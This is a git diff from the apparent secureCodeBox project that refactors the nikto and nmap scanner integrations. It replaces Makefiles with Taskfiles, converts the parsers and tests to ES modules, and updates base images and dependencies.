b/scanners/nikto/Makefile deleted file mode 100644 index b75a753216..0000000000 --- a/scanners/nikto/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = nikto -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-bodgeit diff --git a/scanners/nikto/Taskfile.yaml b/scanners/nikto/Taskfile.yaml new file mode 100644 index 0000000000..8ca7765e7d --- /dev/null +++ b/scanners/nikto/Taskfile.yaml @@ -0,0 +1,20 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: nikto + +tasks: + predeploy: + deps: + - demo-targets:deploy:bodgeit + cmds: [] diff --git a/scanners/nikto/integration-tests/nikto.test.js b/scanners/nikto/integration-tests/nikto.test.js index 3f91a5364f..4e8521ef7d 100644 --- a/scanners/nikto/integration-tests/nikto.test.js +++ b/scanners/nikto/integration-tests/nikto.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "nikto scan against bodgeit demo-target", @@ -18,7 +16,7 @@ test( "-Tuning", "1,2,3,5,7,b", ], // See nikto bodgeit example - 90 + 90, ); expect(categories).toMatchInlineSnapshot(` @@ -36,5 +34,5 @@ test( } `); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/nikto/parser/parser.js b/scanners/nikto/parser/parser.js index 7f9b971074..85379d30bb 100644 --- a/scanners/nikto/parser/parser.js +++ b/scanners/nikto/parser/parser.js @@ -11,7 +11,7 @@ const HIGH = "HIGH"; * * @param {string} category */ -function categorize({id}) { +function categorize({ id }) { if (id === 999957) { return ["X-Frame-Options Header", LOW]; } else if (id === 999102) { @@ -41,11 +41,16 @@ function categorize({id}) { return ["Nikto Finding", INFORMATIONAL]; } -async function parse(niktoReport) { - if (!niktoReport) return []; +export async function parse(fileContent) { + if (!fileContent) return []; - return niktoReport.flatMap( - ({host, ip, port: portString, banner, vulnerabilities}) => { + const report = JSON.parse(fileContent); + if (!report || !report.length) { + return []; + } + + return report.flatMap( + ({ host, ip, port: portString, banner, vulnerabilities }) => { const port = parseInt(portString, 10); if (!vulnerabilities) @@ -54,10 +59,10 @@ async function parse(niktoReport) { return vulnerabilities .filter(Boolean) - .map(({id, method, url, msg, references}) => { + .map(({ id, method, url, msg, references }) => { const niktoId = parseInt(id, 10); - const [category, severity] = categorize({id: niktoId}); + const [category, severity] = categorize({ id: niktoId }); // We can only guess at this point. Nikto doesn't tell use anymore :( const protocol = port === 443 || port === 8443 ? "https" : "http"; @@ -101,8 +106,6 @@ async function parse(niktoReport) { }, }; }); - } + }, ); } - -module.exports.parse = parse; diff --git a/scanners/nikto/parser/parser.test.js b/scanners/nikto/parser/parser.test.js index e597e6e38f..bf1737d27c 100644 --- a/scanners/nikto/parser/parser.test.js +++ b/scanners/nikto/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const {parse} = require("./parser"); +import { parse } from "./parser"; test("parses www.securecodebox.io result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/docs.securecodebox.io.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/docs.securecodebox.io.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -21,10 +20,11 @@ test("parses www.securecodebox.io result file into findings", async () => { }); test("parses OWASP Juice Shop result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -32,10 +32,11 @@ test("parses OWASP Juice Shop result file into findings", async () => { }); test("should properly parse empty json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/empty-report.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/empty-report.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -43,10 +44,11 @@ test("should properly parse empty json file", async () => { }); test("parses 'no web server found' finding correctly", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/unresolvable-host.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/unresolvable-host.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/nikto/scanner/Dockerfile b/scanners/nikto/scanner/Dockerfile index 9e0e587941..014a48e45a 100644 --- a/scanners/nikto/scanner/Dockerfile +++ b/scanners/nikto/scanner/Dockerfile @@ -2,12 +2,12 @@ # # SPDX-License-Identifier: Apache-2.0 -FROM alpine:3.14 AS build +FROM alpine:3.22 AS build ARG scannerVersion RUN apk add git RUN git clone --depth 1 https://github.com/sullo/nikto.git /nikto -FROM alpine:3.14 +FROM alpine:3.22 ENV PATH=${PATH}:/nikto @@ -21,6 +21,6 @@ RUN apk add --update --no-cache --virtual .build-deps \ COPY --from=build --chown=nikto:nikto /nikto/program /nikto -USER 1001 +USER 1001 ENTRYPOINT [ "sh", "/wrapper.sh" ] diff --git a/scanners/nmap/Makefile b/scanners/nmap/Makefile deleted file mode 100644 index eeaa10300c..0000000000 --- a/scanners/nmap/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = nmap -custom_scanner = set - -include ../../scanners.mk diff --git a/scanners/nmap/Taskfile.yaml b/scanners/nmap/Taskfile.yaml new file mode 100644 index 0000000000..b3b42498e0 --- /dev/null +++ b/scanners/nmap/Taskfile.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: nmap + +tasks: {} diff --git a/scanners/nmap/integration-tests/nmap.test.js b/scanners/nmap/integration-tests/nmap.test.js index 9ab07ecb7c..b49f7c6f1c 100644 --- a/scanners/nmap/integration-tests/nmap.test.js +++ b/scanners/nmap/integration-tests/nmap.test.js @@ -2,18 +2,16 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "localhost port scan should only find a host finding", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "nmap-localhost", "nmap", ["localhost"], - 90 + 90, ); expect(count).toBe(1); @@ -28,17 +26,21 @@ test( } `); }, - 3 * 60 * 1000 + { + timeout: 3 * 60 * 1000, + }, ); test( "invalid port scan should be marked as errored", async () => { await expect( - scan("nmap-localhost", "nmap", ["-invalidFlag", "localhost"], 90) + scan("nmap-localhost", "nmap", ["-invalidFlag", "localhost"], 90), ).rejects.toThrow( - 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"' + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', ); }, - 3 * 60 * 1000 + { + timeout: 3 * 60 * 1000, + }, ); diff --git a/scanners/nmap/parser/Dockerfile b/scanners/nmap/parser/Dockerfile index 6aff6d3bd7..0dbef28c20 100644 --- a/scanners/nmap/parser/Dockerfile +++ b/scanners/nmap/parser/Dockerfile @@ -8,7 +8,7 @@ FROM node:22-alpine AS build RUN mkdir -p /home/app WORKDIR /home/app COPY package.json package-lock.json ./ -RUN npm ci --production +RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/parser-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/parser-wrapper/parser/ diff --git a/scanners/nmap/parser/package-lock.json b/scanners/nmap/parser/package-lock.json index d3ff999aa1..760276d131 100644 --- a/scanners/nmap/parser/package-lock.json +++ b/scanners/nmap/parser/package-lock.json @@ -9,15 +9,16 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "lodash": "^4.17.21", - "xml2js": "^0.6.0" + "lodash-es": "^4.17.21", + "xml2js": "^0.6.2" }, "devDependencies": {} }, - "node_modules/lodash": { + "node_modules/lodash-es": { "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" }, "node_modules/sax": { "version": "1.2.4", @@ -25,9 +26,10 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "node_modules/xml2js": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.0.tgz", - "integrity": "sha512-eLTh0kA8uHceqesPqSE+VvO1CDDJWMwlQfB6LuN6T8w6MaDJ8Txm8P7s5cHD0miF0V+GGTZrDQfxPZQVsur33w==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", + "license": "MIT", "dependencies": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" @@ -46,10 +48,10 @@ } }, "dependencies": { - "lodash": { + "lodash-es": { "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" }, "sax": { "version": "1.2.4", @@ -57,9 +59,9 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "xml2js": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.0.tgz", - "integrity": "sha512-eLTh0kA8uHceqesPqSE+VvO1CDDJWMwlQfB6LuN6T8w6MaDJ8Txm8P7s5cHD0miF0V+GGTZrDQfxPZQVsur33w==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", "requires": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" diff --git a/scanners/nmap/parser/package.json b/scanners/nmap/parser/package.json index 6e5f06da7a..733c619bf5 100644 --- a/scanners/nmap/parser/package.json +++ b/scanners/nmap/parser/package.json @@ -5,11 +5,12 @@ "main": "", "scripts": {}, "keywords": [], + "type": "module", "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "lodash": "^4.17.21", - "xml2js": "^0.6.0" + "lodash-es": "^4.17.21", + "xml2js": "^0.6.2" }, "devDependencies": {} -} +} \ No newline at end of file diff --git a/scanners/nmap/parser/parser.js b/scanners/nmap/parser/parser.js index 717dd867fd..38f388adc5 100644 --- a/scanners/nmap/parser/parser.js +++ b/scanners/nmap/parser/parser.js @@ -2,32 +2,32 @@ // // SPDX-License-Identifier: Apache-2.0 -const xml2js = require('xml2js'); -const { get, merge } = require('lodash'); +import { parseString } from "xml2js"; +import { get, merge } from "lodash-es"; - -async function parse(fileContent) { +export async function parse(fileContent) { const hosts = await parseResultFile(fileContent); return transformToFindings(hosts); } function transformToFindings(hosts) { - const scriptFindings = transformNMAPScripts(hosts); const portFindings = hosts.flatMap(({ openPorts = [], ...hostInfo }) => { - if(openPorts === null){ + if (openPorts === null) { return []; } - return openPorts.map(openPort => { + return openPorts.map((openPort) => { return { - name: openPort.service ? `Open Port: ${openPort.port} (${openPort.service})`: `Open Port: ${openPort.port}`, + name: openPort.service + ? `Open Port: ${openPort.port} (${openPort.service})` + : `Open Port: ${openPort.port}`, description: `Port ${openPort.port} is ${openPort.state} using ${openPort.protocol} protocol.`, - category: 'Open Port', + category: "Open Port", location: `${openPort.protocol}://${getHostOrIp(hostInfo)}:${openPort.port}`, - osi_layer: 'NETWORK', - severity: 'INFORMATIONAL', + osi_layer: "NETWORK", + severity: "INFORMATIONAL", attributes: { port: openPort.port, state: openPort.state, @@ -49,12 +49,12 @@ function transformToFindings(hosts) { const hostFindings = hosts.map(({ hostname, ips, osNmap }) => { return { - name: `Host: ${getHostOrIp({ hostname, ips})}`, - category: 'Host', - description: 'Found a host', + name: `Host: ${getHostOrIp({ hostname, ips })}`, + category: "Host", + description: "Found a host", location: hostname, - severity: 'INFORMATIONAL', - osi_layer: 'NETWORK', + severity: "INFORMATIONAL", + osi_layer: "NETWORK", attributes: { ip_addresses: ips, hostname: hostname, @@ -79,10 +79,9 @@ function getHostOrIp(hostInfo) { function transformNMAPScripts(hosts) { let scriptFindings = []; - for(const host of hosts) { - - if(host.scripts) { - for(const script of host.scripts) { + for (const host of hosts) { + if (host.scripts) { + for (const script of host.scripts) { // Parse Script Results const parseFunction = scriptParser[script.$.id]; if (parseFunction) { @@ -97,137 +96,147 @@ function transformNMAPScripts(hosts) { const scriptParser = { "ftp-anon": parseFtpAnon, - "banner": parseBanner, + banner: parseBanner, "smb-protocols": parseSmbProtocols, -} +}; function parseFtpAnon(host, script) { - return [merge( - { - name: "Anonymous FTP Login possible", - description: `Port ${host.openPorts[0].port} allows anonymous FTP login`, - severity: 'MEDIUM', - }, - parseFtpCommon(host, script) - )] + return [ + merge( + { + name: "Anonymous FTP Login possible", + description: `Port ${host.openPorts[0].port} allows anonymous FTP login`, + severity: "MEDIUM", + }, + parseFtpCommon(host, script), + ), + ]; } function parseBanner(host, script) { - return [merge( - { - name: "Server banner found", - description: `Port ${host.openPorts[0].port} displays banner`, - severity: 'INFORMATIONAL', - attributes: { - banner: script.$.output || null, + return [ + merge( + { + name: "Server banner found", + description: `Port ${host.openPorts[0].port} displays banner`, + severity: "INFORMATIONAL", + attributes: { + banner: script.$.output || null, + }, }, - }, - host.openPorts[0].port === 21 ? parseFtpCommon(host, script) : parseCommon(host,script) - )] + host.openPorts[0].port === 21 + ? parseFtpCommon(host, script) + : parseCommon(host, script), + ), + ]; } function parseFtpCommon(host, script) { return { - category: 'FTP', + category: "FTP", location: `ftp://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', + osi_layer: "NETWORK", attributes: { script: script.$.id || null, }, - } + }; } function parseCommon(host, script) { return { - category: 'TCP', + category: "TCP", location: `tcp://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', + osi_layer: "NETWORK", attributes: { script: script.$.id || null, }, - } + }; } function parseSmbProtocols(host, script) { // Parse SMB Script Results - console.log ("Found SMB Script Result: " + script.$.output); + console.log("Found SMB Script Result: " + script.$.output); //console.log (script); var scriptFindings = []; - if(script.table && script.table[0] && script.table[0].elem) { - - for(const elem of script.table[0].elem) { - console.log ("Found SMB SMB Protocol: " + elem); + if (script.table && script.table[0] && script.table[0].elem) { + for (const elem of script.table[0].elem) { + console.log("Found SMB SMB Protocol: " + elem); //console.log (elem); - const smbVersion = elem.toString().includes("SMBv1") ? 1 : parseFloat(elem); + const smbVersion = elem.toString().includes("SMBv1") + ? 1 + : parseFloat(elem); const attributes = { - hostname: host.hostname, - mac_address: host.mac || null, - ip_addresses: host.ips, - port: host.openPorts[0].port, - state: host.openPorts[0].state, - protocol: host.openPorts[0].protocol, - method: host.openPorts[0].method, - operating_system: host.osNmap || null, - service: host.openPorts[0].service, - serviceProduct: host.openPorts[0].serviceProduct || null, - serviceVersion: host.openPorts[0].serviceVersion || null, - scripts: elem || null, - smb_protocol_version: smbVersion, - } + hostname: host.hostname, + mac_address: host.mac || null, + ip_addresses: host.ips, + port: host.openPorts[0].port, + state: host.openPorts[0].state, + protocol: host.openPorts[0].protocol, + method: host.openPorts[0].method, + operating_system: host.osNmap || null, + service: host.openPorts[0].service, + serviceProduct: host.openPorts[0].serviceProduct || null, + serviceVersion: host.openPorts[0].serviceVersion || null, + scripts: elem || null, + smb_protocol_version: smbVersion, + }; - if(elem.toString().includes("SMBv1")) { + if (elem.toString().includes("SMBv1")) { scriptFindings.push({ name: "SMB Dangerous Protocol Version Finding SMBv1", description: `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: SMBv1`, - category: 'SMB', + category: "SMB", location: `${host.openPorts[0].protocol}://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', - severity: 'HIGH', - attributes: attributes + osi_layer: "NETWORK", + severity: "HIGH", + attributes: attributes, }); - } - else if(!isNaN(smbVersion)) { - if(smbVersion > 0 && smbVersion < 2) { + } else if (!isNaN(smbVersion)) { + if (smbVersion > 0 && smbVersion < 2) { scriptFindings.push({ - name: "SMB Dangerous Protocol Version Finding v"+smbVersion, - description: `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: ` + smbVersion, - category: 'SMB', + name: "SMB Dangerous Protocol Version Finding v" + smbVersion, + description: + `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: ` + + smbVersion, + category: "SMB", location: `${host.openPorts[0].protocol}://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', - severity: 'MEDIUM', - attributes: attributes + osi_layer: "NETWORK", + severity: "MEDIUM", + attributes: attributes, }); - } - else if(smbVersion >= 2 && smbVersion < 3) { + } else if (smbVersion >= 2 && smbVersion < 3) { scriptFindings.push({ - name: "SMB Protocol Version Finding v"+smbVersion, - description: `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: `+ smbVersion, - category: 'SMB', + name: "SMB Protocol Version Finding v" + smbVersion, + description: + `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: ` + + smbVersion, + category: "SMB", location: `${host.openPorts[0].protocol}://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', - severity: 'LOW', - attributes: attributes + osi_layer: "NETWORK", + severity: "LOW", + attributes: attributes, }); - } - else if(smbVersion >= 3) { + } else if (smbVersion >= 3) { scriptFindings.push({ - name: "SMB Protocol Version Finding v"+smbVersion, - description: `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with version: ` + smbVersion, - category: 'SMB', + name: "SMB Protocol Version Finding v" + smbVersion, + description: + `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with version: ` + + smbVersion, + category: "SMB", location: `${host.openPorts[0].protocol}://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', - severity: 'INFORMATIONAL', - attributes: attributes + osi_layer: "NETWORK", + severity: "INFORMATIONAL", + attributes: attributes, }); } } } } - return scriptFindings + return scriptFindings; } /** @@ -240,13 +249,13 @@ function parseSmbProtocols(host, script) { * osNmap: null, * scripts: null * } - * @param {*} fileContent + * @param {*} fileContent */ function parseResultFile(fileContent) { return new Promise((resolve, reject) => { - xml2js.parseString(fileContent, (err, xmlInput) => { + parseString(fileContent, (err, xmlInput) => { if (err) { - reject(new Error('Error converting XML to JSON in xml2js: ' + err)); + reject(new Error("Error converting XML to JSON in xml2js: " + err)); } else { let tempHostList = []; if (!xmlInput.nmaprun.host) { @@ -256,120 +265,132 @@ function parseResultFile(fileContent) { xmlInput = xmlInput.nmaprun.host; - tempHostList = xmlInput.map(host => { - const newHost = { - hostname: null, - ip: null, - mac: null, - openPorts: null, - osNmap: null, - scripts: null - }; - - if (host.status && host.status?.[0]?.$?.state === 'down') { - return null; - } - - // Get hostname - if ( - host.hostnames && - host.hostnames[0] !== '\r\n' && - host.hostnames[0] !== '\n' - ) { - newHost.hostname = host.hostnames[0].hostname[0].$.name; - } - - const cleanAddresses = host.address.map(address => { - return { - type: address.$.addrtype, - address: address.$.addr, - vendor: address.$.vendor + tempHostList = xmlInput + .map((host) => { + const newHost = { + hostname: null, + ip: null, + mac: null, + openPorts: null, + osNmap: null, + scripts: null, }; - }); - newHost.mac = cleanAddresses.find((address) => address.type === "mac")?.address; - - newHost.ips = cleanAddresses - .filter((address) => address.type.startsWith("ip")) - .map((address) => address.address); + if (host.status && host.status?.[0]?.$?.state === "down") { + return null; + } - // Get ports - if (host.ports && host.ports[0].port) { - const portList = host.ports[0].port; + // Get hostname + if ( + host.hostnames && + host.hostnames[0] !== "\r\n" && + host.hostnames[0] !== "\n" + ) { + newHost.hostname = host.hostnames[0].hostname[0].$.name; + } - const openPorts = portList.filter(port => { - return port.state[0].$.state !== 'closed'; + const cleanAddresses = host.address.map((address) => { + return { + type: address.$.addrtype, + address: address.$.addr, + vendor: address.$.vendor, + }; }); - newHost.openPorts = openPorts.map(portItem => { - // console.log(JSON.stringify(portItem, null, 4)) - - const port = parseInt(portItem.$.portid, 10); - const protocol = portItem.$.protocol; - const service = get(portItem, ["service",0,"$","name"]); - const serviceProduct = get(portItem, ["service",0,"$","product"]); - const serviceVersion = get(portItem, ["service",0,"$","version"]); - - const tunnel = get(portItem, ["service",0,"$","tunnel"]); - const method = get(portItem, ["service",0,"$","method"]); - const product = get(portItem, ["service",0,"$","tunnel"]); - - const state = portItem.state[0].$.state; - - let scriptOutputs = null; - - if (portItem.script) { - scriptOutputs = portItem.script.reduce( - (carry, { $: scriptRes }) => { - carry[scriptRes.id] = scriptRes.output; - return carry; - }, - {} - ); - } - - let portObject = {}; - if (port) portObject.port = port; - if (protocol) portObject.protocol = protocol; - if (service) portObject.service = service; - if (serviceProduct) portObject.serviceProduct = serviceProduct; - if (serviceVersion) portObject.serviceVersion = serviceVersion; - - if (tunnel) portObject.tunnel = tunnel; - if (method) portObject.method = method; - if (product) portObject.product = product; - - if (state) portObject.state = state; - - if (scriptOutputs) portObject.scriptOutputs = scriptOutputs; + newHost.mac = cleanAddresses.find( + (address) => address.type === "mac", + )?.address; + + newHost.ips = cleanAddresses + .filter((address) => address.type.startsWith("ip")) + .map((address) => address.address); + + // Get ports + if (host.ports && host.ports[0].port) { + const portList = host.ports[0].port; + + const openPorts = portList.filter((port) => { + return port.state[0].$.state !== "closed"; + }); + + newHost.openPorts = openPorts.map((portItem) => { + // console.log(JSON.stringify(portItem, null, 4)) + + const port = parseInt(portItem.$.portid, 10); + const protocol = portItem.$.protocol; + const service = get(portItem, ["service", 0, "$", "name"]); + const serviceProduct = get(portItem, [ + "service", + 0, + "$", + "product", + ]); + const serviceVersion = get(portItem, [ + "service", + 0, + "$", + "version", + ]); + + const tunnel = get(portItem, ["service", 0, "$", "tunnel"]); + const method = get(portItem, ["service", 0, "$", "method"]); + const product = get(portItem, ["service", 0, "$", "tunnel"]); + + const state = portItem.state[0].$.state; + + let scriptOutputs = null; + + if (portItem.script) { + scriptOutputs = portItem.script.reduce( + (carry, { $: scriptRes }) => { + carry[scriptRes.id] = scriptRes.output; + return carry; + }, + {}, + ); + } + + let portObject = {}; + if (port) portObject.port = port; + if (protocol) portObject.protocol = protocol; + if (service) portObject.service = service; + if (serviceProduct) portObject.serviceProduct = serviceProduct; + if (serviceVersion) portObject.serviceVersion = serviceVersion; + + if (tunnel) portObject.tunnel = tunnel; + if (method) portObject.method = method; + if (product) portObject.product = product; + + if (state) portObject.state = state; + + if (scriptOutputs) portObject.scriptOutputs = scriptOutputs; + + return portObject; + }); + } - return portObject; - }); - } - - // Get Script Content - if(host.hostscript && host.hostscript[0].script) { - newHost.scripts = host.hostscript[0].script - } - // Get Script Content in case the script is of the port-rule type, - // and thus has the script under 'port' instead of 'hostscript'. - else if(host.ports && host.ports[0].port){ - for (let i=0; i < host.ports[0].port.length; i++){ - if ((host.ports[0].port)[i].script) { - newHost.scripts = host.ports[0].port[i].script + // Get Script Content + if (host.hostscript && host.hostscript[0].script) { + newHost.scripts = host.hostscript[0].script; + } + // Get Script Content in case the script is of the port-rule type, + // and thus has the script under 'port' instead of 'hostscript'. + else if (host.ports && host.ports[0].port) { + for (let i = 0; i < host.ports[0].port.length; i++) { + if (host.ports[0].port[i].script) { + newHost.scripts = host.ports[0].port[i].script; + } } } - } - if (host.os && host.os[0].osmatch && host.os[0].osmatch[0].$.name) { - newHost.osNmap = host.os[0].osmatch[0].$.name; - } - return newHost; - }).filter(Boolean); + if (host.os && host.os[0].osmatch && host.os[0].osmatch[0].$.name) { + newHost.osNmap = host.os[0].osmatch[0].$.name; + } + return newHost; + }) + .filter(Boolean); resolve(tempHostList); } }); }); } - -module.exports.parse = parse; diff --git a/scanners/nmap/parser/parser.test.js b/scanners/nmap/parser/parser.test.js index 4701dde475..595f0a97e8 100644 --- a/scanners/nmap/parser/parser.test.js +++ b/scanners/nmap/parser/parser.test.js @@ -2,19 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const {parse} = require("./parser"); +import { parse } from "./parser"; test("should properly parse nmap xml file", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/localhost.xml", + import.meta.dirname + "/__testFiles__/localhost.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); // validate findings @@ -141,9 +139,12 @@ test("should properly parse nmap xml file", async () => { }); test("should properly parse a nmap xml without any ports", async () => { - const xmlContent = await readFile(__dirname + "/__testFiles__/no-ports.xml", { - encoding: "utf8", - }); + const xmlContent = await readFile( + import.meta.dirname + "/__testFiles__/no-ports.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(xmlContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -169,9 +170,12 @@ test("should properly parse a nmap xml without any ports", async () => { }); test("should properly parse a nmap xml without any host", async () => { - const xmlContent = await readFile(__dirname + "/__testFiles__/no-host.xml", { - encoding: "utf8", - }); + const xmlContent = await readFile( + import.meta.dirname + "/__testFiles__/no-host.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(xmlContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -180,10 +184,10 @@ test("should properly parse a nmap xml without any host", async () => { test("should properly parse a nmap xml with missing service information", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/no-service.xml", + import.meta.dirname + "/__testFiles__/no-service.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); @@ -236,10 +240,10 @@ test("should properly parse a nmap xml with missing service information", async test("Should properly parse a nmap xml with script specific SMB findings", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/localhost-smb-script.xml", + import.meta.dirname + "/__testFiles__/localhost-smb-script.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); @@ -441,9 +445,12 @@ test("Should properly parse a nmap xml with script specific SMB findings", async }); test("should properly parse a script finding for ftp in an xml file", async () => { - const xmlContent = await readFile(__dirname + "/__testFiles__/ftp.xml", { - encoding: "utf8", - }); + const xmlContent = await readFile( + import.meta.dirname + "/__testFiles__/ftp.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(xmlContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(await parse(xmlContent)).toMatchInlineSnapshot(` @@ -460,11 +467,15 @@ test("should properly parse a script finding for ftp in an xml file", async () = "port": 21, "protocol": "tcp", "scripts": { - "banner": "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x + "banner": + "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x 0D\\x0A220-You are user number 2 of 30 allowed.\\x0D\\x0A220-Local time... - ", - "ftp-anon": "Anonymous FTP login allowed (FTP code 230) - Can't get directory listing: PASV IP 127.0.0.1 is not the same as 10.103.42.74", + " + , + "ftp-anon": + "Anonymous FTP login allowed (FTP code 230) + Can't get directory listing: PASV IP 127.0.0.1 is not the same as 10.103.42.74" + , }, "service": "ftp", "serviceProduct": null, @@ -496,9 +507,11 @@ test("should properly parse a script finding for ftp in an xml file", async () = }, { "attributes": { - "banner": "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x + "banner": + "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x 0D\\x0A220-You are user number 2 of 30 